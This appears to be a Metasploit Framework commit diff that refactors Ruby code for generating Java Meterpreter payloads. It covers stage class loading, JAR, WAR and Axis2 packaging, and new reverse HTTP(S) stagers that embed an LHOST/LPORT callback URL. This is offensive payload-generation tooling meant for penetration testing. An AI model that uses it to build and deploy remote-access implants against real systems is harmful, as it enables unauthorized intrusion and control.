Revamp of java payload structure

Author: OJ

lib/msf/core/payload/java.rb

@@ -4,7 +4,7 @@
 module Msf::Payload::Java
 
   #
-  # Used by stages; all java stages need to define +@stage_class_files+ as an
+  # Used by stages; all java stages need to define +stage_class_files+ as an
   # array of .class files located in data/java/
   #
   # The staging protocol expects any number of class files, each prepended
@@ -15,8 +15,12 @@ module Msf::Payload::Java
   #	[ 32-bit null ]
   #
   def generate_stage(opts={})
+    generate_default_stage(opts)
+  end
+
+  def generate_default_stage(opts={})
     stage = ''
-    @stage_class_files.each do |path|
+    stage_class_files.each do |path|
       data = MetasploitPayloads.read('java', path)
       stage << [data.length, data].pack('NA*')
     end
@@ -34,28 +38,27 @@ def generate(opts={})
 
   #
   # Used by stagers to create a jar file as a {Rex::Zip::Jar}.  Stagers
-  # define a list of class files in @class_files which are pulled from the
-  # MetasploitPayloads gem. The configuration file is created by
-  # the payload's #config method.
+  # define a list of class files from the class_files method. The
+  # configuration file is created by the payload's #stager_config method.
   #
   # @option opts :main_class [String] the name of the Main-Class
   #   attribute in the manifest.  Defaults to "metasploit.Payload"
   # @option opts :random [Boolean] Set to `true` to randomize the
   #   "metasploit" package name.
   # @return [Rex::Zip::Jar]
   def generate_jar(opts={})
-    raise if not respond_to? :config
+    raise if not respond_to? :stager_config
     # Allow changing the jar's Main Class in the manifest so wrappers
     # around metasploit.Payload will work.
     main_class = opts[:main_class] || "metasploit.Payload"
 
     paths = [
       [ "metasploit", "Payload.class" ],
-    ] + @class_files
+    ] + class_files
 
     jar = Rex::Zip::Jar.new
     jar.add_sub("metasploit") if opts[:random]
-    jar.add_file("metasploit.dat", config)
+    jar.add_file("metasploit.dat", stager_config)
     jar.add_files(paths, MetasploitPayloads.path('java'))
     jar.build_manifest(:main_class => main_class)
 
@@ -71,7 +74,7 @@ def generate_jar(opts={})
   #   web.xml.  Defaults to random
   #
   def generate_war(opts={})
-    raise if not respond_to? :config
+    raise if not respond_to? :stager_config
     zip = Rex::Zip::Jar.new
 
     web_xml = %q{<?xml version="1.0"?>
@@ -96,27 +99,26 @@ def generate_war(opts={})
     paths = [
       [ "metasploit", "Payload.class" ],
       [ "metasploit", "PayloadServlet.class" ],
-    ] + @class_files
+    ] + class_files
 
     zip.add_file('WEB-INF/', '')
     zip.add_file('WEB-INF/web.xml', web_xml)
     zip.add_file("WEB-INF/classes/", "")
     zip.add_files(paths, MetasploitPayloads.path('java'), 'WEB-INF/classes/')
-    zip.add_file("WEB-INF/classes/metasploit.dat", config)
+    zip.add_file("WEB-INF/classes/metasploit.dat", stager_config)
 
     zip
   end
 
   #
   # Used by stagers to create a axis2 webservice file as a {Rex::Zip::Jar}.
-  # Stagers define a list of class files in @class_files which are pulled
-  # from the MetasploitPayloads gem. The configuration file is created by
-  # the payload's #config method.
+  # Stagers define a list of class files returned via class_files.  The
+  # configuration file is created by the payload's #stager_config method.
   #
   # @option :app_name [String] Name of the Service in services.xml. Defaults to random.
   # @return [Rex::Zip::Jar]
   def generate_axis2(opts={})
-    raise if not respond_to? :config
+    raise if not respond_to? :stager_config
 
     app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)
 
@@ -132,16 +134,26 @@ def generate_axis2(opts={})
     paths = [
       [ 'metasploit', 'Payload.class' ],
       [ 'metasploit', 'PayloadServlet.class' ]
-    ] + @class_files
+    ] + class_files
 
     zip = Rex::Zip::Jar.new
     zip.add_file('META-INF/', '')
     zip.add_file('META-INF/services.xml', services_xml)
     zip.add_files(paths, MetasploitPayloads.path('java'))
-    zip.add_file('metasploit.dat', config)
+    zip.add_file('metasploit.dat', stager_config)
     zip.build_manifest(:app_name => app_name)
 
     zip
   end
 
+  # Default to no extra class files
+  def class_files
+    []
+  end
+
+  # Default to no extra stage class files
+  def stage_class_files
+    []
+  end
+
 end

lib/msf/core/payload/java/meterpreter_loader.rb

@@ -0,0 +1,102 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/core/payload/uuid/options'
+
+module Msf
+
+###
+#
+# Common module stub for Java payloads that make use of Meterpreter.
+#
+###
+
+module Payload::Java::MeterpreterLoader
+
+  include Msf::Payload::Java
+  include Msf::Payload::UUID::Options
+  include Msf::Sessions::MeterpreterOptions
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Meterpreter & Configuration',
+      'Description'   => 'Java-specific meterpreter generation',
+      'Author'        => ['OJ Reeves'],
+      'Platform'      => 'java',
+      'Arch'          => ARCH_JAVA,
+      'PayloadCompat' => {'Convention' => 'http'},
+      'Stage'         => {'Payload' => ''}
+      ))
+  end
+
+  def stage_payload(opts={})
+    stage_meterpreter(opts)
+  end
+
+  #
+  # Override the Payload::Java version so we can load a prebuilt jar to be
+  # used as the final stage; calls super to get the intermediate stager.
+  #
+  def stage_meterpreter(opts={})
+    met = MetasploitPayloads.read('meterpreter', 'meterpreter.jar')
+    config = generate_config(opts)
+
+    # All of the dependencies to create a jar loader, followed by the length
+    # of the jar and the jar itself, then the config
+    blocks = [
+      generate_default_stage(opts),
+      [met.length, met].pack('NA*'),
+      [config.length, config].pack('NA*')
+    ]
+
+    # Deliberate off by 1 here. The call to super adds a null terminator
+    # so we would add 1 for the null terminate and remove one for the call
+    # to super.
+    block_count = blocks.length + stage_class_files.length
+
+    # Pack all the magic together
+    (blocks + [block_count]).pack('A*' * blocks.length + 'N')
+  end
+
+  def generate_config(opts={})
+    opts[:uuid] ||= generate_payload_uuid
+    ds = opts[:datastore] || datastore
+
+    # create the configuration block, which for staged connections is really simple.
+    config_opts = {
+      ascii_str:  true,
+      arch:       opts[:uuid].arch,
+      expiration: ds['SessionExpirationTimeout'].to_i,
+      uuid:       opts[:uuid],
+      transports: opts[:transport_config] || [transport_config(opts)]
+    }
+
+    # create the configuration instance based off the parameters
+    config = Rex::Payloads::Meterpreter::Config.new(config_opts)
+
+    # return the binary version of it
+    config.to_b
+  end
+
+  def stage_class_files
+    # Order matters.  Classes can only reference classes that have already
+    # been sent.  The last .class must implement Stage, i.e. have a start()
+    # method.
+    #
+    # The Meterpreter.class stage is just a jar loader, not really anything
+    # to do with meterpreter specifically.  This payload should eventually
+    # be replaced with an actual meterpreter stage so we don't have to send
+    # a second jar.
+    [
+      [ "javapayload", "stage", "Stage.class" ],
+      [ "com", "metasploit", "meterpreter", "MemoryBufferURLConnection.class" ],
+      [ "com", "metasploit", "meterpreter", "MemoryBufferURLStreamHandler.class" ],
+      # Must be last!
+      [ "javapayload", "stage", "Meterpreter.class" ],
+    ]
+  end
+
+end
+end
+

lib/msf/core/payload/java/reverse_http.rb

@@ -0,0 +1,100 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/transport_config'
+require 'msf/core/payload/uuid/options'
+
+module Msf
+
+###
+#
+# Complex payload generation for Java that speaks HTTP(S)
+#
+###
+
+module Payload::Java::ReverseHttp
+
+  include Msf::Payload::TransportConfig
+  include Msf::Payload::Java
+  include Msf::Payload::UUID::Options
+
+  #
+  # Register Java reverse_http specific options
+  #
+  def initialize(*args)
+    super
+    register_advanced_options([
+      Msf::OptInt.new('Spawn', [true, "Number of subprocesses to spawn", 2])
+    ])
+  end
+
+  #
+  # Generate the transport-specific configuration
+  #
+  def transport_config(opts={})
+    transport_config_reverse_http(opts)
+  end
+
+  #
+  # Generate the URI for the initial stager
+  #
+  def generate_uri(opts={})
+    ds = opts[:datastore] || datastore
+    uri_req_len = ds['StagerURILength'].to_i
+
+    # Choose a random URI length between 30 and 255 bytes
+    if uri_req_len == 0
+      uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
+    end
+
+    if uri_req_len < 5
+      raise ArgumentError, "Minimum StagerURILength is 5"
+    end
+
+    generate_uri_uuid_mode(:init_java, uri_req_len)
+  end
+
+  #
+  # Generate the URI for the initial stager
+  #
+  def generate_small_uri
+    generate_uri_uuid_mode(:init_java, 5)
+  end
+
+  #
+  # Generate configuration that is to be included in the stager.
+  #
+  def stager_config(opts={})
+    uri = generate_uri(opts)
+    ds = opts[:datastore] || datastore
+
+    c =  ''
+    c << "Spawn=#{ds["Spawn"] || 2}\n"
+    c << "URL=#{scheme}://#{ds['LHOST']}"
+    c << ":#{ds['LPORT']}" if ds['LPORT']
+    c << luri
+    c << uri
+    c << "\n"
+
+    c
+  end
+
+  #
+  # Scheme defaults to http
+  #
+  def scheme
+    'http'
+  end
+
+  #
+  # Always wait at least 20 seconds for this payload (due to staging delays)
+  #
+  def wfs_delay
+    20
+  end
+
+end
+
+end
+
+

lib/msf/core/payload/java/reverse_https.rb

@@ -0,0 +1,41 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/java/reverse_http'
+
+module Msf
+
+###
+#
+# Complex payload generation for Java that speaks HTTPS
+#
+###
+
+module Payload::Java::ReverseHttps
+
+  include Msf::Payload::Java::ReverseHttp
+
+  #
+  # Generate the transport-specific configuration
+  #
+  def transport_config(opts={})
+    transport_config_reverse_https(opts)
+  end
+
+  #
+  # Override the scheme so that it has https instead of http
+  #
+  def scheme
+    'https'
+  end
+
+  #
+  # Override class_files to include the trust manager
+  #
+  def class_files
+    [
+      ["metasploit", "PayloadTrustManager.class"]
+    ]
+  end
+end
+end

lib/msf/core/payload/python/meterpreter_loader.rb

@@ -14,6 +14,7 @@ module Msf
 
 module Payload::Python::MeterpreterLoader
 
+  include Msf::Payload::Python
   include Msf::Payload::UUID::Options
   include Msf::Sessions::MeterpreterOptions
 

lib/msf/core/payload/stager.rb

@@ -89,7 +89,10 @@ def offsets
   #
   # @return [String,nil]
   def stage_payload(opts = {})
-    return module_info['Stage']['Payload']
+    if module_info['Stage']
+      return module_info['Stage']['Payload']
+    end
+    nil
   end
 
   #